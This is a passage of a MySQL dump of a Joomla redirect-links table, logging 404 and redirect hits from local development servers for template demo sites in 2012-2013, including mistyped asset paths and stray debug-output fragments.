
--
-- Table structure for table `l_redirect_links`
--

CREATE TABLE `l_redirect_links` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `old_url` varchar(255) NOT NULL,
  `new_url` varchar(255) NOT NULL,
  `referer` varchar(150) NOT NULL,
  `comment` varchar(255) NOT NULL,
  `hits` int(10) unsigned NOT NULL DEFAULT '0',
  `published` tinyint(4) NOT NULL,
  `created_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_link_old` (`old_url`),
  KEY `idx_link_modifed` (`modified_date`)
) ENGINE=InnoDB AUTO_INCREMENT=680 DEFAULT CHARSET=utf8;

--
-- Dumping data for table `l_redirect_links`
--

INSERT INTO `l_redirect_links` VALUES (1,'http://localhost/free/future/index.php/module-variations','','','',5,0,'2012-10-23 10:16:36','0000-00-00 00:00:00'),(2,'http://localhost/free/future/index.php/component/404','','http://localhost/free/future/','',139,0,'2012-10-24 07:10:51','0000-00-00 00:00:00'),(3,'http://localhost/free/future/index.php/component/404/joomla/iframe-wrapper','','http://localhost/free/future/index.php/joomla/iframe-wrapper','',2,0,'2012-10-24 07:32:27','0000-00-00 00:00:00'),(4,'http://localhost/futurefinal/index.php/component/404','','http://localhost/futurefinal/','',1,0,'2012-11-12 08:51:49','0000-00-00 00:00:00'),(5,'http://localhost/futurefinal/index.php/joomla/index.php','','http://localhost/futurefinal/index.php/joomla/contact','',2,0,'2012-11-12 11:46:51','0000-00-00 00:00:00'),(6,'http://127.0.0.1/2012/futurefinal/index.php/joomla/index.php','','http://127.0.0.1/2012/futurefinal/index.php/joomla/contact','',4,0,'2012-11-14 08:57:45','0000-00-00 00:00:00'),(7,'http://192.168.1.10/workspace/corporate2/index.php?TemplateStyle=style1&Itemid=496','','http://192.168.1.10/workspace/corporate2/','',1,0,'2013-02-04 13:25:54','0000-00-00 00:00:00'),(8,'http://192.168.1.10/workspace/corporate2/index.php/theme/templates/it_corporate2/css/styles/style3.css','','http://192.168.1.10/workspace/corporate2/index.php/theme/module-variations','',11,0,'2013-02-06 14:03:02','0000-00-00 00:00:00'),(9,'http://192.168.1.10/workspace/corporate2/index.php/theme/templates/it_corporate2/css/styles/style2.css','','http://192.168.1.10/workspace/corporate2/index.php/theme/module-variations','',11,0,'2013-02-07 11:00:52','0000-00-00 00:00:00'),(10,'http://192.168.1.10/workspace/corporate2/index.php/theme/templates/it_corporate2/css/styles/style1.css','','http://192.168.1.10/workspace/corporate2/index.php/theme/module-variations','',3,0,'2013-02-07 14:29:11','0000-00-00 00:00:00'),(11,'http://192.168.1.10/workspace/corporate2/index.php/theme/templates/it_corporate2/css/styles/style6.css','','http://192.168.1.10/workspace/corporate2/index.php/theme/module-variations','',2,0,'2013-02-11 10:49:37','0000-00-00 00:00:00'),(12,'http://192.168.1.10/workspace/corporate2/index.php/theme/templates/it_corporate2/css/styles/style4.css','','http://192.168.1.10/workspace/corporate2/index.php/theme/module-variations','',2,0,'2013-02-11 10:51:33','0000-00-00 00:00:00'),(13,'http://192.168.1.10/workspace/corporate2/index.php/en/404','','','',1,0,'2013-02-12 11:12:20','0000-00-00 00:00:00'),(14,'http://192.168.1.10/workspace/corporate2/index.php/theme/custom-page/templates/it_corporate2/css/styles/style3.css','','http://192.168.1.10/workspace/corporate2/index.php/theme/custom-page/about-us','',1,0,'2013-02-12 11:12:22','0000-00-00 00:00:00'),(15,'http://192.168.1.10/workspace/corporate2/index.php/404','','http://192.168.1.10/workspace/corporate2/index.php/theme/custom-page/portfolio','',4,0,'2013-02-12 11:12:37','0000-00-00 00:00:00'),(16,'http://192.168.5.10/joomla/2013/newsy4/index.php/404','','http://192.168.5.10/joomla/2013/newsy4/','',17,0,'2013-03-07 13:23:06','0000-00-00 00:00:00'),(17,'http://192.168.5.10/joomla/2013/newsy4/theme/index.php','','http://192.168.5.10/joomla/2013/newsy4/theme/module-variations','',2,0,'2013-03-08 11:43:44','0000-00-00 00:00:00'),(18,'http://192.168.5.10/joomla/2013/newsy4/undefined','','http://192.168.5.10/joomla/2013/newsy4/','',6,0,'2013-03-12 10:35:16','0000-00-00 00:00:00'),(19,'http://192.168.5.10/joomla/2013/newsy4/undefined?1363088012705','','http://192.168.5.10/joomla/2013/newsy4/','',1,0,'2013-03-12 11:33:33','0000-00-00 00:00:00'),(20,'http://192.168.5.10/joomla/2013/newsy4/undefined?1363088028422','','http://192.168.5.10/joomla/2013/newsy4/','',1,0,'2013-03-12 11:33:49','0000-00-00 00:00:00'),(21,'http://192.168.5.10/joomla/2013/newsy4/undefined?1363088043387','','http://192.168.5.10/joomla/2013/newsy4/','',1,0,'2013-03-12 11:34:04','0000-00-00 00:00:00'),(22,'http://192.168.5.10/joomla/2013/newsy4/undefined?1363094712348','','http://192.168.5.10/joomla/2013/newsy4/','',1,0,'2013-03-12 13:25:15','0000-00-00 00:00:00'),(23,'http://192.168.5.10/joomla/2013/newsy4/images/sampledata/icetheme/logos/logo_%3Cbr%20/%3E%3Cfont%20size=%271%27%3E%3Ctable%20class=%27xdebug-error%20xe-notice%27%20dir=%27ltr%27%20border=%271%27%20cellspacing=%270%27%20cellpadding=%271%27%3E%3Ctr%3E%3Cth%','','http://192.168.5.10/joomla/2013/newsy4/','',1,0,'2013-03-15 09:36:02','0000-00-00 00:00:00'),(24,'http://192.168.5.10/joomla/2013/newsy4/images/sampledata/icetheme/logo/logo_%3Cbr%20/%3E%3Cfont%20size=%271%27%3E%3Ctable%20class=%27xdebug-error%20xe-notice%20xe-scream%27%20dir=%27ltr%27%20border=%271%27%20cellspacing=%270%27%20cellpadding=%271%27%3E%3C','','http://192.168.5.10/joomla/2013/newsy4/','',1,0,'2013-03-15 09:36:49','0000-00-00 00:00:00'),(25,'http://localhost/cloner/newsy4/installation/index.php','','http://localhost/cloner/newsy4/installation/index.php','',1,0,'2013-03-18 11:33:26','0000-00-00 00:00:00'),(26,'http://192.168.5.10/joomla/2013/theshop2/installation/index.php','','http://192.168.5.10/joomla/2013/theshop2/installation/index.php','',1,0,'2013-03-25 11:03:41','0000-00-00 00:00:00'),(27,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/i','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/module-variations','',8,0,'2013-03-27 09:37:13','0000-00-00 00:00:00'),(28,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/im','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/module-variations','',8,0,'2013-03-27 09:37:13','0000-00-00 00:00:00'),(29,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/ima','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/module-variations','',9,0,'2013-03-27 09:37:13','0000-00-00 00:00:00'),(30,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/imag','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/module-variations','',8,0,'2013-03-27 09:37:13','0000-00-00 00:00:00'),(31,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/image','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/module-variations','',8,0,'2013-03-27 09:37:13','0000-00-00 00:00:00'),(32,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/c','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/module-variations','',4,0,'2013-03-27 09:37:15','0000-00-00 00:00:00'),(33,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/ca','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/module-variations','',1,0,'2013-03-27 09:37:15','0000-00-00 00:00:00'),(34,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/cat','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/module-variations','',1,0,'2013-03-27 09:37:15','0000-00-00 00:00:00'),(35,'http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping/category/view/index.php','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping/category/view/4','',6,0,'2013-03-29 15:46:01','0000-00-00 00:00:00'),(36,'http://192.168.5.10/joomla/2013/theshop2/index.php/404','','http://192.168.5.10/joomla/2013/theshop2/','',22,0,'2013-04-01 14:08:22','0000-00-00 00:00:00'),(37,'http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping/product/view/1/index.php','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping/product/view/1/7','',6,0,'2013-04-01 15:08:41','0000-00-00 00:00:00'),(38,'http://192.168.5.10/joomla/2013/theshop2/i','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping','',2,0,'2013-04-02 13:06:25','0000-00-00 00:00:00'),(39,'http://192.168.5.10/joomla/2013/theshop2/im','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping','',1,0,'2013-04-02 13:06:25','0000-00-00 00:00:00'),(40,'http://192.168.5.10/joomla/2013/theshop2/ima','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping','',1,0,'2013-04-02 13:06:25','0000-00-00 00:00:00'),(41,'http://192.168.5.10/joomla/2013/theshop2/imag','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping','',1,0,'2013-04-02 13:06:27','0000-00-00 00:00:00'),(42,'http://192.168.5.10/joomla/2013/theshop2/image','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping','',1,0,'2013-04-02 13:06:27','0000-00-00 00:00:00'),(43,'http://192.168.5.10/joomla/2013/theshop2/images/p','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping','',1,0,'2013-04-02 13:06:28','0000-00-00 00:00:00'),(44,'http://192.168.5.10/joomla/2013/theshop2/images/pl','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping','',1,0,'2013-04-02 13:06:28','0000-00-00 00:00:00'),(45,'http://192.168.5.10/joomla/2013/theshop2/images/plu','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping','',1,0,'2013-04-02 13:06:28','0000-00-00 00:00:00'),(46,'http://192.168.5.10/joomla/2013/theshop2/images/plus','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping','',1,0,'2013-04-02 13:06:28','0000-00-00 00:00:00'),(47,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/p','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping','',2,0,'2013-04-02 13:06:54','0000-00-00 00:00:00'),(48,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/pl','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping','',2,0,'2013-04-02 13:06:54','0000-00-00 00:00:00'),(49,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/plui','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping','',1,0,'2013-04-02 13:06:54','0000-00-00 00:00:00'),(50,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/pluis','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping','',1,0,'2013-04-02 13:06:54','0000-00-00 00:00:00'),(51,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/plu','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping','',2,0,'2013-04-02 13:06:55','0000-00-00 00:00:00'),(52,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/plus','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping','',2,0,'2013-04-02 13:06:56','0000-00-00 00:00:00'),(53,'http://192.168.1.10/joomla/2013/theshop2/index.php/joomshooping/category/view/index.php','','http://192.168.1.10/joomla/2013/theshop2/index.php/joomshooping/category/view/1','',1,0,'2013-04-03 11:59:23','0000-00-00 00:00:00'),(54,'http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping/category/view/%22.$item-%3Ecategory_link.%22','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping/category/view/1?limitstart=0','',2,0,'2013-04-04 12:35:23','0000-00-00 00:00:00'),(55,'http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping/product/view/3/index.php','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping/product/view/3/15','',2,0,'2013-04-05 11:31:39','0000-00-00 00:00:00'),(56,'http://192.168.5.10/joomla/2013/theshop2/adminiustrator','','','',1,0,'2013-04-08 07:09:54','0000-00-00 00:00:00'),(57,'http://192.168.5.10/joomla/2013/theshop2/test','','http://192.168.5.10/joomla/2013/theshop2/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/image.htm','',1,0,'2013-04-08 12:17:27','0000-00-00 00:00:00'),(58,'http://192.168.5.10/joomla/2013/theshop2/index.php/joomshooping/product/view/1/13','','http://192.168.5.10/joomla/2013/theshop2/','',1,0,'2013-04-08 12:24:13','0000-00-00 00:00:00'),(59,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/imae','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',2,0,'2013-04-09 07:28:11','0000-00-00 00:00:00'),(60,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/o','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',1,0,'2013-04-09 07:28:35','0000-00-00 00:00:00'),(61,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/of','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',1,0,'2013-04-09 07:28:35','0000-00-00 00:00:00'),(62,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/off','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',1,0,'2013-04-09 07:28:36','0000-00-00 00:00:00'),(63,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/offl','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',1,0,'2013-04-09 07:28:36','0000-00-00 00:00:00'),(64,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/offli','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',1,0,'2013-04-09 07:28:36','0000-00-00 00:00:00'),(65,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/offlin','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',1,0,'2013-04-09 07:28:36','0000-00-00 00:00:00'),(66,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/offline','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',1,0,'2013-04-09 07:28:37','0000-00-00 00:00:00'),(67,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/offline_','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',1,0,'2013-04-09 07:28:37','0000-00-00 00:00:00'),(68,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/offline_h','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',1,0,'2013-04-09 07:28:37','0000-00-00 00:00:00'),(69,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/offline_he','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',1,0,'2013-04-09 07:28:38','0000-00-00 00:00:00'),(70,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/offline_hea','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',1,0,'2013-04-09 07:28:38','0000-00-00 00:00:00'),(71,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/offline_head','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',1,0,'2013-04-09 07:28:38','0000-00-00 00:00:00'),(72,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/offline_heade','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',1,0,'2013-04-09 07:28:38','0000-00-00 00:00:00'),(73,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/offline_header','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',1,0,'2013-04-09 07:28:38','0000-00-00 00:00:00'),(74,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/imaes','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',1,0,'2013-04-09 07:43:42','0000-00-00 00:00:00'),(75,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/he','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',1,0,'2013-04-09 07:43:46','0000-00-00 00:00:00'),(76,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/hea','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',1,0,'2013-04-09 07:43:46','0000-00-00 00:00:00'),(77,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/heag','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',1,0,'2013-04-09 07:43:47','0000-00-00 00:00:00'),(78,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/head','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',1,0,'2013-04-09 07:43:48','0000-00-00 00:00:00'),(79,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/heade','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',1,0,'2013-04-09 07:43:48','0000-00-00 00:00:00'),(80,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/header','','http://192.168.5.10/joomla/2013/theshop2/?tmpl=offline','',2,0,'2013-04-09 07:43:48','0000-00-00 00:00:00'),(81,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/co','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',3,0,'2013-04-09 08:20:31','0000-00-00 00:00:00'),(82,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/col','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',3,0,'2013-04-09 08:20:31','0000-00-00 00:00:00'),(83,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/colm','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',3,0,'2013-04-09 08:20:32','0000-00-00 00:00:00'),(84,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/colme','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',3,0,'2013-04-09 08:20:32','0000-00-00 00:00:00'),(85,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/colmen','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',3,0,'2013-04-09 08:20:32','0000-00-00 00:00:00'),(86,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/colmenu','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',3,0,'2013-04-09 08:20:32','0000-00-00 00:00:00'),(87,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/colmenu_','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',3,0,'2013-04-09 08:20:33','0000-00-00 00:00:00'),(88,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/colmenu_p','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',3,0,'2013-04-09 08:20:35','0000-00-00 00:00:00'),(89,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/colmenu_po','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',3,0,'2013-04-09 08:20:35','0000-00-00 00:00:00'),(90,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/colmenu_poi','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',3,0,'2013-04-09 08:20:35','0000-00-00 00:00:00'),(91,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/colmenu_poin','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',3,0,'2013-04-09 08:20:35','0000-00-00 00:00:00'),(92,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/images/colmenu_point','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',3,0,'2013-04-09 08:20:36','0000-00-00 00:00:00'),(93,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/css/..images/','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',2,0,'2013-04-09 08:22:37','0000-00-00 00:00:00'),(94,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/css/..images/c','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',2,0,'2013-04-09 08:22:38','0000-00-00 00:00:00'),(95,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/css/..images/co','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',2,0,'2013-04-09 08:22:39','0000-00-00 00:00:00'),(96,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/css/..images/col','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',2,0,'2013-04-09 08:22:39','0000-00-00 00:00:00'),(97,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/css/..images/colm','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',2,0,'2013-04-09 08:22:39','0000-00-00 00:00:00'),(98,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/css/..images/colmen','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',2,0,'2013-04-09 08:22:39','0000-00-00 00:00:00'),(99,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/css/..images/colmenu','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',2,0,'2013-04-09 08:22:39','0000-00-00 00:00:00'),(100,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/css/..images/colmenu_','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',4,0,'2013-04-09 08:22:40','0000-00-00 00:00:00'),(101,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/css/..images/colmenu_p','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',2,0,'2013-04-09 08:22:51','0000-00-00 00:00:00'),(102,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/css/..images/colmenu_po','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',2,0,'2013-04-09 08:22:51','0000-00-00 00:00:00'),(103,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/css/..images/colmenu_poi','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',2,0,'2013-04-09 08:22:51','0000-00-00 00:00:00'),(104,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/css/..images/colmenu_poin','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',2,0,'2013-04-09 08:22:52','0000-00-00 00:00:00'),(105,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/css/..images/colmenu_point','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/custom-pages/about-us','',2,0,'2013-04-09 08:22:52','0000-00-00 00:00:00'),(106,'http://192.168.5.10/joomla/2013/theshop2/templates/it_theshop2/css/styles/style-switcher.php?templatestyle=style2','','http://192.168.5.10/joomla/2013/theshop2/','',2,0,'2013-04-09 10:49:19','0000-00-00 00:00:00'),(107,'http://192.168.5.10/joomla/2013/theshop2/index.php/joomshopping/category/view/index.php','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshopping/category/view/1','',8,0,'2013-04-10 11:25:15','0000-00-00 00:00:00'),(108,'http://192.168.5.10/joomla/2013/theshop2/index.php/en/theme/index.php','','http://192.168.5.10/joomla/2013/theshop2/index.php/en/theme/module-positions','',1,0,'2013-04-11 08:14:02','0000-00-00 00:00:00'),(109,'http://192.168.5.10/joomla/2013/theshop2/index.php/en/theme/module-positions','','http://192.168.5.10/joomla/2013/theshop2/','',2,0,'2013-04-11 08:18:42','0000-00-00 00:00:00'),(110,'http://192.168.5.10/joomla/2013/theshop2/index.php/joomshopping/product/view/1/index.php','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshopping/product/view/1/6','',1,0,'2013-04-15 09:46:21','0000-00-00 00:00:00'),(111,'http://192.168.5.10/joomla/2013/theshop2/index.php/joomshopping/list-vendors','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshopping/list-vendors/products?vendor_id=1','',4,0,'2013-04-16 12:54:49','0000-00-00 00:00:00'),(112,'http://192.168.5.10/joomla/2013/theshop2/index.php/joomshopping/list-vendors/products?vendor_id=1','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshopping/list-vendors/products?vendor_id=1','',2,0,'2013-04-16 12:54:52','0000-00-00 00:00:00'),(113,'http://192.168.5.10/joomla/2013/theshop2/index.php/joomshopping/list-manufactuers','','http://192.168.5.10/joomla/2013/theshop2/','',2,0,'2013-04-16 12:55:30','0000-00-00 00:00:00'),(114,'http://192.168.5.10/joomla/2013/theshop2/index.php/joomshopping/product/view/3/index.php','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshopping/product/view/3/13','',3,0,'2013-04-17 13:52:37','0000-00-00 00:00:00'),(115,'http://192.168.5.10/joomla/2013/theshop2/index.php/template/module-positions','','http://192.168.5.10/joomla/2013/theshop2/index.php/theme/module-variations','',1,0,'2013-04-18 14:42:55','0000-00-00 00:00:00'),(116,'http://192.168.5.10/joomla/2013/theshop2/index.php/en/','','http://192.168.5.10/joomla/2013/theshop2/index.php/de/','',5,0,'2013-04-19 08:24:01','0000-00-00 00:00:00'),(117,'http://192.168.5.10/joomla/2013/theshop2/en/','','http://192.168.5.10/joomla/2013/theshop2/en/joomshopping/cart/view','',1,0,'2013-04-19 08:24:10','0000-00-00 00:00:00'),(118,'http://192.168.5.10/joomla/2013/theshop2/en/joomshopping/category/view','','http://192.168.5.10/joomla/2013/theshop2/index.php/joomshopping/category/view/37','',2,0,'2013-04-19 08:34:51','0000-00-00 00:00:00'),(119,'http://192.168.5.10/joomla/2013/theshop2/de/joomshopping-de','','http://192.168.5.10/joomla/2013/theshop2/de/','',1,0,'2013-04-19 08:45:46','0000-00-00 00:00:00'),(120,'http://192.168.5.10/joomla/2013/theshop2/en/joomshopping-en','','','',1,0,'2013-04-19 09:21:39','0000-00-00 00:00:00'),(121,'http://192.168.5.10/joomla/2013/theshop2/index.php/de/joomla/contact','','http://192.168.5.10/joomla/2013/theshop2/index.php/de/joomshopping/product/view/1/14','',1,0,'2013-04-24 09:13:26','0000-00-00 00:00:00'),(122,'http://192.168.5.10/joomla/2013/theshop2/index.php/de/','','http://192.168.5.10/joomla/2013/theshop2/index.php/de/','',1,0,'2013-04-24 09:13:28','0000-00-00 00:00:00'),(123,'http://192.168.5.10/joomla/2013/theshop2/index.php/de/joomla/iframe-wrapper','','http://192.168.5.10/joomla/2013/theshop2/index.php/de/joomshopping/product/view/1/14','',1,0,'2013-04-24 09:13:30','0000-00-00 00:00:00'),(124,'http://192.168.5.10/joomla/2013/theshop2/index.php/de/joomshopping','','http://192.168.5.10/joomla/2013/theshop2/','',1,0,'2013-04-24 12:52:40','0000-00-00 00:00:00'),(125,'http://localhost/joomla/2013/theshop2_cloneinstaller/index.php/404','','http://localhost/joomla/2013/theshop2_cloneinstaller/','',1,0,'2013-04-29 10:54:24','0000-00-00 00:00:00'),(126,'http://192.168.5.10/joomla/2013/it_university2/index.php/images/module_heading_left_style1_after.png','','http://192.168.5.10/joomla/2013/it_university2/index.php/theme/module-variations','',1,0,'2013-05-08 08:58:03','0000-00-00 00:00:00'),(127,'http://192.168.5.10/joomla/2013/it_university2/index.php/images/module_heading_left_style1_before.png','','http://192.168.5.10/joomla/2013/it_university2/index.php/theme/module-variations','',1,0,'2013-05-08 08:58:03','0000-00-00 00:00:00'),(128,'http://192.168.5.10/joomla/2013/it_university2/index.php/images/module_heading_left_after.png','','http://192.168.5.10/joomla/2013/it_university2/index.php/theme/module-variations','',1,0,'2013-05-08 08:58:03','0000-00-00 00:00:00'),(129,'http://192.168.5.10/joomla/2013/it_university2/index.php/images/module_heading_left_style2_before.png','','http://192.168.5.10/joomla/2013/it_university2/index.php/theme/module-variations','',1,0,'2013-05-08 08:58:03','0000-00-00 00:00:00'),(130,'http://192.168.5.10/joomla/2013/it_university2/index.php/images/module_heading_left_before.png','','http://192.168.5.10/joomla/2013/it_university2/index.php/theme/module-variations','',1,0,'2013-05-08 08:58:03','0000-00-00 00:00:00'),(131,'http://192.168.5.10/joomla/2013/it_university2/index.php/images/module_heading_left_style2_after.png','','http://192.168.5.10/joomla/2013/it_university2/index.php/theme/module-variations','',1,0,'2013-05-08 08:58:03','0000-00-00 00:00:00'),(132,'http://192.168.5.10/joomla/2013/it_university2/index.php/images/module_heading__style1_before.png','','http://192.168.5.10/joomla/2013/it_university2/index.php/theme/module-variations','',1,0,'2013-05-08 08:58:48','0000-00-00 00:00:00'),(133,'http://192.168.5.10/joomla/2013/it_university2/index.php/images/module_heading_style1_before.png','','http://192.168.5.10/joomla/2013/it_university2/index.php/theme/module-variations','',1,0,'2013-05-08 08:58:49','0000-00-00 00:00:00'),(134,'http://192.168.5.10/joomla/2013/it_university2/index.php/theme/images/module_heading_style1_before.png','','http://192.168.5.10/joomla/2013/it_university2/index.php/theme/module-variations','',1,0,'2013-05-08 08:59:11','0000-00-00 00:00:00'),(135,'http://192.168.1.10/joomla/2013/it_university2/index.php/en/404','','http://192.168.1.10/joomla/2013/it_university2/index.php/en/theme/custom-pages','',1,0,'2013-05-10 10:19:19','0000-00-00 